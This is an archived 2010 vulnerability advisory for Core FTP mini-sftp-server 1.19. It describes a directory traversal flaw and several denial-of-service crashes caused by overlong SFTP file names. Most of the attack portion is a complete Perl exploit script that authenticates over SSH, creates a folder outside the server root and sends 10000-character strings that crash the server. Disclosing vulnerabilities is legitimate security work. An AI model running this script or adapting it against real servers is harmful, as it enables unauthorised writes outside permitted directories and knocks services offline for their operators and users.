AOH :: HP Unsorted C :: B1A-1215.HTM

Core FTP mini-sftp-server Several DoS and Directory Traversal Vulnerabilities



Core FTP mini-sftp-server Several DoS and Directory Traversal Vulnerabilities
Core FTP mini-sftp-server Several DoS and Directory Traversal Vulnerabilities



Date of Discovery:
7-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor: 
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html 

Affected:
Core FTP mini-sftp-server version 1.19. 
Earlier versions may also be affected.

Overview:
"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does--They have the same vulnerabilities.

1.	Directory Traversal vulnerability:
	$m = $sftp->mkdir("../A/");# create a folder outside the root directory

2.	Denial of Service vulnerability:
	$o1 = $sftp->open("A" x 10000);
	$o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
	$o3 = $sftp->open("test", $FUZZ, 0666);	$o3 = $sftp->open("test", $FUZZ, 0666);
	$st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^


Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#the script will first make a folder "A" outside the root directory and then crash the server.

use Net::SSH2;
use Getopt::Std;


$FUZZ = "A" x 10000; 

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
	print "usage:\n\tperl	test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
	print "\tperl	test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
	exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#make a folder outside the root directory
$m = $sftp->mkdir("../A/");

#any command of the following would cause Core FTP mini-sftp-server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);

$ssh2->disconnect();

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.